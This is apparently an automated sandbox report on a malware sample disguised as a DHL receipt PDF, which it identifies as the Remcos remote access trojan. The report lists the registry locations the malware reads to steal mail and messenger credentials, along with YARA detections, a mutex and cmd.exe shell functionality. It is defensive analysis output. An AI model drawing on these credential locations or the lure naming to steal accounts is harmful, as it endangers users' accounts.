Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Tries to steal Mail credentials (via file / registry access)
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8144, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\ProgramData\Remcos\remcos.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Yara detected Remcos RAT
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: cmd.exe 0_2_2DA4569A